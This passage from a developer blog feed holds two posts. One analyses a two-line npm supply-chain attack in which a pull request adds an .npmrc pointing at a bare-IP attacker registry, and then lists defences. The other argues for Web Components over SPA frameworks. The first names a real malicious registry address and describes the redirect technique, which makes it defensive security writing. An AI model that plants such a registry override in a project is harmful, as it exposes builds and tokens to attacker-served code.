  <li>It overrides resolution for <strong>the entire install</strong>, not just the one shiny new dependency. Every package your build fetches now potentially comes from the attacker.</li>
</ol>

<p>The second file change is <code class="language-plaintext highlighter-rouge">package.json</code>, and it is the fig leaf that makes the <code class="language-plaintext highlighter-rouge">.npmrc</code> look purposeful:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code>   "devDependencies": {
     "@types/node": "22.10.5",
     "typedoc": "0.28.19",
<span class="gd">-    "typescript": "6.0.3"
</span><span class="gi">+    "typescript": "6.0.3",
+    "ethers-multicall-utils": "^2.1.4"
</span>   }
</code></pre></div></div>

<p>A new dependency is added that — surprise — does not need to exist on the real npm registry, because the <code class="language-plaintext highlighter-rouge">.npmrc</code> has already rerouted resolution to the attacker’s server. They can serve whatever they like under that name: a package whose <code class="language-plaintext highlighter-rouge">postinstall</code> script runs their code, or a trojaned copy of something you already trust. The <code class="language-plaintext highlighter-rouge">^2.1.4</code> caret is a nice touch too — it pre-authorises any “newer” version they decide to push later.</p>

<p>There was also a cosmetic edit re-escaping the <code class="language-plaintext highlighter-rouge">ü</code> in my own name in the <code class="language-plaintext highlighter-rouge">author</code> field. Pure diff noise, there to make the commit read like a tidy housekeeping pass. I have rarely felt so personally tidied.</p>

<h2 id="why-this-is-the-dangerous-kind">Why this is the dangerous kind</h2>

<p>The Shai-Hulud worm was loud. It propagated, it phoned home, it cloned private repos, and that noise is exactly what gets it caught and written up. This thing is the opposite design philosophy. It is quiet, it is two lines, and it weaponises <em>your own install command</em>. You do not need to be tricked into running anything exotic. You run <code class="language-plaintext highlighter-rouge">npm install</code>, the same way you have ten thousand times before, and the trap springs in your CI runner or on your laptop with your npm token sitting right there in the environment.</p>

<p>The chain, end to end:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>plausible "perf refactor" PR
        │
        ▼
package.json adds a dependency that only resolves...
        │
        ▼
...from the registry hardcoded in .npmrc
        │
        ▼
http://&lt;attacker-ip&gt;:&lt;port&gt; serves a malicious package
        │
        ▼
install-time code execution, token harvest, or worse
</code></pre></div></div>

<p>Every link looks boring in isolation. That is the craft.</p>

<h2 id="what-actually-saved-this-repo">What actually saved this repo</h2>

<p>Nothing clever. The PR was reviewed by a human who looked at the files, not just the description, and asked the only question that matters when a PR touches install configuration: <em>why is there a registry line pointing at a random IP over HTTP?</em> There is no benign answer to that question. The PR was closed unmerged.</p>

<p>But “I happened to look” is not a control. Let us turn it into one.</p>

<h2 id="mitigations-in-roughly-the-order-i-would-bother">Mitigations, in roughly the order I would bother</h2>

<p><strong>Treat <code class="language-plaintext highlighter-rouge">.npmrc</code> as a security-critical file.</strong> It configures where your code <em>comes from</em>. That is at least as sensitive as a CI workflow file, and in the previous post I argued the <code class="language-plaintext highlighter-rouge">actions/</code> folder deserves CODEOWNERS and branch protection. <code class="language-plaintext highlighter-rouge">.npmrc</code> deserves exactly the same paranoia. Put it behind CODEOWNERS so any change to it requires a human you trust.</p>

<p><strong>Add a CI check that refuses hostile registry config.</strong> A grep is enough to start. Fail the build if an <code class="language-plaintext highlighter-rouge">.npmrc</code> anywhere in the tree points at a non-HTTPS registry or a bare IP:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># fail if any .npmrc references a non-https or IP-based registry</span>
<span class="k">if </span>git <span class="nb">grep</span> <span class="nt">-nE</span> <span class="s1">'registry\s*=\s*https?://'</span> <span class="nt">--</span> <span class="s1">'**/.npmrc'</span> <span class="se">\</span>
   | <span class="nb">grep</span> <span class="nt">-vE</span> <span class="s1">'=\s*https://([a-z0-9.-]+\.)?(npmjs\.org|your-private-registry\.example)/'</span> <span class="p">;</span> <span class="k">then
  </span><span class="nb">echo</span> <span class="s2">"Suspicious registry override detected in .npmrc"</span>
  <span class="nb">exit </span>1
<span class="k">fi</span>
</code></pre></div></div>

<p>Tune the allowlist to your actual registries. The point is that <em>new</em> registry endpoints become a deliberate, reviewed event rather than something that rides in on a refactor.</p>

<p><strong>Pin and verify what you install.</strong> A committed lockfile plus <code class="language-plaintext highlighter-rouge">npm ci</code> (not <code class="language-plaintext highlighter-rouge">npm install</code>) in CI means resolution follows the lockfile, and a foreign registry URL in there is glaring in review. <code class="language-plaintext highlighter-rouge">--ignore-scripts</code> in CI where you can get away with it removes the install-time code execution primitive that most of these attacks ultimately rely on.</p>

<p><strong>Build in a box with a short leash.</strong> This is the same advice as part one, and this attack is a clean example of why it works: if your build container can only reach your known registry and nothing else, a redirect to <code class="language-plaintext highlighter-rouge">206.223.232.170:64389</code> simply fails to connect. The exfiltration and the malicious fetch both die at the network boundary. DNS/egress allowlisting is not glamorous and it quietly defeats a whole category of this.</p>

<p><strong>Review the diff, never the description.</strong> The PR text is written by the attacker. It is marketing copy. The only ground truth is the files changed tab. If a “performance” or “dependency” PR touches <code class="language-plaintext highlighter-rouge">.npmrc</code>, <code class="language-plaintext highlighter-rouge">package.json</code> install config, lifecycle scripts, or a workflow file, the description becomes irrelevant and the change earns full scrutiny regardless of how friendly the bullet points were.</p>

<p><strong>Assume the friendly account might not be its owner.</strong> An aged profile with good badges is not a trust signal anymore; it is an <em>attack asset</em>, because hijacked reputable accounts are precisely what makes a malicious PR slide through. “Assume breach” applies to your contributors’ credentials, not just your own.</p>

<h2 id="the-uncomfortable-part">The uncomfortable part</h2>

<p>I write a series about supply chain security and someone still walked a registry-hijack PR right up to my front door. That is not a failure of the series; that is the actual threat model. These attacks are cheap, automated, and sprayed across hundreds of repositories at once on the statistical certainty that <em>someone</em> merges at 23:00 with one eye open. You do not have to be careless to get got. You just have to be tired once.</p>

<p>So make the boring controls do the watching for you, because your attention is the resource the attacker is budgeting against.</p>

<p>To misquote the same wise machine I closed part one with:</p>

<blockquote>
  <p>The only winning move is to not run <code class="language-plaintext highlighter-rouge">npm install</code>.</p>
</blockquote>]]></content><author><name>Sebastian Schürmann</name></author><category term="supply-chain-security" /><category term="devops" /><summary type="html"><![CDATA[Dissects a malicious PR that added an .npmrc pointing npm at a bare-IP HTTP registry, and lists defenses from CODEOWNERS and CI checks to egress limits.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://sebs.github.io/assets/posts/a-rogue-registry-in-my-own-backyard-anatomy-of-a-two-line-supply-chain-attack/og.jpg" /><media:content medium="image" url="https://sebs.github.io/assets/posts/a-rogue-registry-in-my-own-backyard-anatomy-of-a-two-line-supply-chain-attack/og.jpg" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Frameworks Rot. The Platform Doesn’t.</title><link href="https://sebs.github.io/2026/06/12/frameworks-rot-the-platform-doesnt/" rel="alternate" type="text/html" title="Frameworks Rot. The Platform Doesn’t." /><published>2026-06-12T18:46:48+00:00</published><updated>2026-06-12T18:46:48+00:00</updated><id>https://sebs.github.io/2026/06/12/frameworks-rot-the-platform-doesnt</id><content type="html" xml:base="https://sebs.github.io/2026/06/12/frameworks-rot-the-platform-doesnt/"><![CDATA[<blockquote>
  <p><em>A decision memo for anyone staring at their <code class="language-plaintext highlighter-rouge">package.json</code> and wondering.</em></p>
</blockquote>

<p>Most arguments for leaving your SPA framework center on the upgrade treadmill — the endless cycle of major-version migrations, dependency churn, and build-tool turnover. That argument is real but incomplete, and on its own it has never been decisive: every framework shop has learned to live with the treadmill. There’s a stronger case, built on four pillars that compound with each other.</p>

<p>First, <strong>total cost of ownership</strong>: vanilla JavaScript on the web platform has unusual TCO properties, dominated by a depreciation curve that is nearly flat. Code written against the platform does not rot, because its substrate does not change. Over long horizons, this single property outweighs almost every per-feature productivity argument in a framework’s favor.</p>

<p>Second, <strong>the labor market</strong>: the pool of people who can work on vanilla JavaScript is not a niche within the frontend market — it is the entire frontend market, plus most of the backend market. Every framework developer is, underneath, a JavaScript developer. The reverse is not true. If you hire for a specific framework, you’re hiring from a subset while telling yourself you’re hiring from the mainstream.</p>

<p>Third, <strong>AI leverage</strong>: engineers now produce a growing share of code with AI assistance, and the economics of that assistance differ sharply by target. The web platform is a small, stable, exhaustively documented body of knowledge; a framework ecosystem is a large, fast-mutating one whose training data is perpetually stale. AI coding tools are measurably more reliable on the former. As AI-assisted development becomes the dominant mode of production, the substrate that AI handles best becomes the cheaper substrate — and the gap widens every year the platform stays still while frameworks move.</p>

<p>Fourth, <strong>architecture</strong>: porting to Web Components is not a transliteration of the same design into different syntax. The platform pushes toward a genuinely different architecture — autonomous, message-passing components rather than a centrally reconciled tree — and that architecture has its own economic consequences, mostly favorable for a broad class of applications, which you should adopt deliberately rather than discover by accident.</p>

<p>The recommendation, stated up front: if your application sits in the right quadrant — long-lived, stabilizing, forms-and-views rather than collaborative-canvas — migrate incrementally via the strangler pattern, and reject any big-bang rewrite. The rest of this post develops each pillar, the reasoning behind them, and the conditions under which the whole argument flips.</p>

<h2 id="2-tenets">2. Tenets</h2>

<p>Before the pillars, the principles they rest on. If you disagree with a conclusion below, the disagreement is probably with one of these — and that’s the productive place to have it.</p>

<ol>
  <li><strong>Optimize total cost of ownership over the application’s full life, not development cost over the next quarter.</strong> A foundation’s depreciation rate matters more than its day-one ergonomics.</li>
  <li><strong>Measure labor pools at the skill floor, not the skill label.</strong> The relevant question is not “how many React developers exist” but “how many people can become productive in this codebase in a month.”</li>
  <li><strong>The cost of code is increasingly the cost of supervising AI that writes it.</strong> Substrates should be chosen partly for how well machines generate, verify, and maintain code on them.</li>
  <li><strong>Architecture is an economic object.</strong> Coupling structure determines change cost; choose the structure, don’t inherit it from a library’s render model.</li>
  <li><strong>Prefer two-way doors.</strong> A migration plan must be pausable mid-flight while still having paid for itself.</li>
</ol>

<h2 id="3-pillar-one-the-tco-curve-of-platform-native-code">3. Pillar One: The TCO Curve of Platform-Native Code</h2>

<p>Most software cost models obsess over construction cost and treat the maintenance tail as a multiplier. For long-lived applications, this is backwards: the tail is the animal. Industry experience consistently puts lifetime maintenance at several multiples of initial development, and the <em>composition</em> of that maintenance is what distinguishes substrates.</p>

<p>Framework code carries three maintenance components: (a) changes you choose to make — features, fixes; (b) changes the substrate forces on you — version migrations, deprecations, dependency security churn, toolchain turnover; and (c) the eventual full rewrite, when the foundation’s liability exceeds the asset’s value. Platform-native code carries only (a). Component (b) approaches zero because browsers do not ship breaking changes to the DOM; the platform’s backwards-compatibility record spans decades, and code written against Custom Elements and CSS custom properties in 2026 will run unmodified in 2040. Component (c) — the scheduled-but-undated rewrite — is eliminated outright, and it’s the largest single line in any honest long-horizon model: the cost of your entire application, again, plus the behavioral archaeology of rediscovering a decade of micro-decisions nobody remembers making.</p>

<p>The resulting picture is two depreciation curves. Framework code depreciates like a vehicle: it loses value continuously through ecosystem drift even when untouched, and requires periodic capital injections (major-version migrations) merely to retain function. Platform code depreciates like land with a building on it: the building — your features — needs upkeep proportional to how often <em>you</em> change it, but the ground does not move. On a four-year horizon the curves barely separate, and the framework’s day-one ergonomics win. On a ten-year horizon the flat curve dominates decisively, with the crossover arriving well before year eight even under assumptions generous to the framework.</p>

<p>One honest cost on the vanilla side of the ledger: the platform lacks a built-in reactivity model, so any non-trivial app will carry a thin, standards-tracking layer — a few hundred lines of signals, or a micro-library like Lit. That’s a maintenance liability you own. It’s also bounded, inspectable, and sits on a substrate that doesn’t move beneath it — a fundamentally different risk class from a framework’s hundreds of thousands of lines on a quarterly release cadence.</p>

<h2 id="4-pillar-two-the-labor-pool-is-larger-not-smaller">4. Pillar Two: The Labor Pool Is Larger, Not Smaller</h2>

<p>The conventional objection runs: “the market is full of React developers; vanilla and Web Components are a niche; you’d be narrowing your hiring funnel.” This inverts the actual structure of the market.</p>

<p>Every framework developer writes JavaScript. The framework is a dialect on top of a language they already know; the DOM is the machine their framework ultimately drives. A vanilla codebase is therefore legible, at the floor, to the <em>union</em> of all framework communities — React, Vue, Angular, Svelte — plus the substantial population of full-stack and backend engineers who know JavaScript but never specialized in any frontend framework. A framework codebase is legible to one slice. When a company posts a role requiring deep experience in a specific framework <em>at a specific major version</em>, it filters the market twice: once by dialect, once by dialect vintage. Tenet 2 says to measure at the skill floor: the number of engineers who can be productive in a well-structured vanilla codebase within a month is a strict superset — several times over — of those who can be productive in any single framework codebase.</p>

<p>The second-order effects all point the same direction. <strong>Onboarding</strong> compresses, because there’s no framework dialect, no bespoke state-management idiom, and no build-pipeline folklore to absorb; the learning surface is the platform itself — which every candidate has been marinating in their whole career — plus your domain. <strong>Skill durability</strong> improves: what engineers learn maintaining a vanilla codebase (DOM, events, encapsulation, the platform’s actual contract) appreciates over their careers rather than expiring with a framework’s market share — which, incidentally, makes such roles easier to sell to strong senior candidates who have been burned by dialect churn before. <strong>Key-person risk</strong> falls: you’re no longer exposed to the scenario where your framework’s talent pool thins as fashion moves on, leaving you bidding against scarcity for maintenance of an aging stack — the COBOL dynamic, arriving on a ten-year fuse.</p>

<p>The honest counterpoint: average familiarity with Shadow DOM specifics — slot composition, event retargeting, <code class="language-plaintext highlighter-rouge">ElementInternals</code> — is genuinely lower than average familiarity with mainstream framework idioms. Size that as a weeks-not-quarters training cost per engineer, set against a structural enlargement of the funnel. That’s a trade worth taking eagerly.</p>

<h2 id="5-pillar-three-ai-leverage--the-small-frozen-corpus-wins">5. Pillar Three: AI Leverage — The Small, Frozen Corpus Wins</h2>

<p>A growing share of code is now produced with AI assistance, and the share keeps rising. This changes what “developer productivity” means: increasingly, the binding constraint is not how fast a human writes code but how reliably a model generates it and how cheaply a human verifies it. Substrate choice now has an AI term in it (Tenet 3), and the term favors the platform, for three structural reasons.</p>

<p><strong>The body of knowledge is small.</strong> The web platform’s API surface — DOM, events, Custom Elements, fetch, modern CSS — is compact and exhaustively specified. A framework ecosystem is that surface <em>plus</em> the framework’s own large API, <em>plus</em> its state-management satellites, <em>plus</em> its meta-framework conventions, <em>plus</em> the idioms of whichever major version is current. A model asked to generate framework code is navigating a pattern space an order of magnitude larger, much of it convention rather than specification, where plausible-looking compositions are subtly wrong.</p>

<p><strong>The corpus is stable.</strong> Models are trained on historical code. For a fast-moving framework, that history is a sediment of deprecated patterns: training data is dominated by yesterday’s idioms, and the model confidently emits APIs that were removed two majors ago, mixes the old paradigm with the new one, or imports packages that have since been renamed. Anyone who uses AI assistants on framework code recognizes this failure mode; it converts generation speed into review burden. Platform APIs don’t have this problem, because the correct pattern of 2016 is still the correct pattern of 2026. The training distribution and the deployment reality coincide. This appears to be a permanent structural advantage: it widens every year the platform stays still while frameworks move, and no amount of model improvement fully closes it, because the staleness is in the data, not the model.</p>

<p><strong>Verification is cheaper.</strong> AI-generated vanilla code is checkable against a public specification and observable directly in a debugger; there’s no reconciler between the code and its effect. AI-generated framework code must additionally be checked against framework semantics — rules of hooks, reactivity caveats, hydration constraints — exactly the kind of non-local, convention-encoded correctness conditions that models violate most and reviewers catch slowest.</p>

<p>The economic translation: if AI assistance produces correct-on-first-pass code meaningfully more often on platform targets — and the day-to-day experience of teams suggests it does — then per-feature production cost on the platform falls faster than on the framework as AI adoption deepens. The framework’s traditional advantage was developer ergonomics for humans. In a regime where machines write the first draft, ergonomics-for-machines is the metric, and it points the other way. The benefit is symmetric, too: a smaller, stable codebase with no framework dialect is easier for AI tools to <em>read</em>, making AI-assisted maintenance, migration, and onboarding cheaper as well.</p>

<h2 id="6-pillar-four-it-is-a-different-architecture-and-that-is-the-point">6. Pillar Four: It Is a Different Architecture, and That Is the Point</h2>

<p>A framework SPA, whatever its component syntax, is architecturally a <em>centrally coordinated</em> system: a single reconciler owns the tree, state changes flow through a global scheduler, and components are functions evaluated inside someone else’s run loop. This buys coherence and costs coupling — every component is coupled to the coordinator’s semantics, which is precisely why framework migrations are total rather than partial. You cannot move one limb at a time when one brain runs the body.</p>

<p>Web Components push toward the opposite: an architecture of <em>autonomous cells</em>. Each custom element owns its state, its shadow-encapsulated rendering, and its lifecycle; coordination happens at the edges, through attributes and properties going down and composed DOM events bubbling up — message passing, not shared reconciliation. The DOM itself becomes the integration layer, which is to say the integration layer is standardized, inspectable, and owned by no vendor.</p>

<p>This architecture has economic consequences worth naming explicitly. <strong>Change locality:</strong> with state and rendering encapsulated per element and styling hard-bounded by the shadow root, the blast radius of a change is structurally small; cost-of-change correlates with the size of the change rather than the size of the application. <strong>Independent evolvability:</strong> components can be rewritten, replaced, or owned by different teams on different schedules, because the contract between them is the DOM, not a framework version — this is the property that makes incremental migration possible at all, and it persists afterward as a permanent option to adopt or shed any future technology one component at a time. <strong>Failure isolation:</strong> autonomous cells degrade locally; a broken widget is a broken widget, not a poisoned render tree. <strong>Honest costs:</strong> truly cross-cutting state — session, theming, live shared data — requires deliberate design (a small event bus or shared reactive stores) rather than reaching for a framework’s global store; and deeply orchestrated interactions spanning many components are genuinely harder to express than in a centralized model. For applications shaped like many semi-independent views over a domain model — most business software, most dashboards, most content products — the trade is strongly favorable. For a real-time collaborative canvas, it isn’t, and it’s better to say so than to pretend.</p>

<p>The strategic point of Tenet 4: don’t port the old architecture into new syntax. The migration’s full return is only collected if you adopt the cell architecture deliberately — defining element contracts, event taxonomies, and the thin shared-state layer up front — so that what you build is not “your framework app, minus the framework,” but a system whose coupling structure is itself the asset.</p>

<h2 id="7-risks-reversal-conditions-and-the-way-to-actually-do-it">7. Risks, Reversal Conditions, and the Way to Actually Do It</h2>

<p>The pillars share failure modes worth naming. The TCO argument fails if the application’s life is cut short — below roughly five years, the flat curve never overtakes. The labor argument fails if the codebase is structured so idiosyncratically that the “anyone who knows JavaScript” floor becomes theoretical; the mitigation is the deliberate architecture of Pillar Four plus written contracts. The AI argument is the youngest and deserves humility plus instrumentation — track first-pass acceptance rates of AI-generated changes on platform-native versus framework surfaces and let the data speak. The architecture argument fails if the product is heading toward heavy cross-component choreography; treat that as a named trigger to reconsider.</p>

<p>And the execution model matters as much as the destination, because the all-at-once rewrite is the highest-risk version of this trade. Web Components offer a uniquely cheap alternative, since custom elements work <em>inside</em> any framework: freeze the framework version first (instantly recovering the upgrade-treadmill capacity, before a single component is ported), build all new components as custom elements mounted within the existing app, convert old components opportunistically when feature work touches them anyway (so the behavioral archaeology is paid for by the feature), and remove the framework shell last, when it has been reduced to routing and a mount point. Each phase pays for itself; the plan is pausable at every stage; even abandoning it after the freeze leaves you better off than before. That’s the two-way door of Tenet 5 — and it’s the property that turns this from a bet into a position you can adjust.</p>

<hr />

<h2 id="appendix-anticipated-questions-faq">Appendix: Anticipated Questions (FAQ)</h2>

<p><strong>Q: The hiring argument seems backwards — job boards show far more framework roles than vanilla roles.</strong>
A: Job postings measure employer demand for dialects, not the supply of capable engineers. The claim here is about supply at the skill floor: everyone writing those framework apps knows JavaScript and the DOM underneath. Going vanilla widens your funnel to the union of all camps; the postings only tell you most employers haven’t noticed.</p>

<p><strong>Q: Won’t AI tools get good enough at frameworks that Pillar Three evaporates?</strong>
A: Models will improve at everything, but the framework penalty is structural, not capability-based: training corpora lag a moving target, and convention-heavy correctness is harder to verify than specification-backed correctness. A better model narrows the gap per task while framework churn re-widens it. Stability is the moat, and only the platform has it.</p>

<p><strong>Q: Isn’t “autonomous cells coordinated by events” just microservices on the frontend, with all the same distributed-system pain?</strong>
A: It shares the virtue — independent evolvability — without the worst costs: no network between components, synchronous composition, and a standardized integration layer (the DOM) that nobody has to build or operate. The genuine analogous cost, designing cross-cutting state deliberately, is acknowledged in Pillar Four and should be budgeted, not discovered.</p>

<p><strong>Q: If platform TCO is so superior, why do new projects keep choosing frameworks?</strong>
A: Because most projects rationally optimize time-to-first-ship on a short horizon, and frameworks win that race. The argument here is about years five through fifteen of an application’s life, where the curves invert. Different phase, different optimum — and most TCO discussions never get past phase one.</p>

<p><strong>Q: What single metric tells a team in a year whether this was right?</strong>
A: Fully-loaded cost per shipped change on converted surfaces versus unconverted ones — inclusive of review time and AI-assist acceptance rates. If converted surfaces aren’t cheaper to change within a couple of quarters, the two-way door is right there.</p>]]></content><author><name>Sebastian Schürmann</name></author><category term="web-development" /><category term="tech-strategy" /><category term="software-architecture" /><summary type="html"><![CDATA[The case for moving from SPA frameworks to vanilla JavaScript and Web Components on TCO, hiring, AI leverage and architecture, via a strangler migration.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://sebs.github.io/assets/posts/frameworks-rot-the-platform-doesnt/og.jpg" /><media:content medium="image" url="https://sebs.github.io/assets/posts/frameworks-rot-the-platform-doesnt/og.jpg" xmlns:media="http://search.yahoo.com/mrss/" /></entry></feed>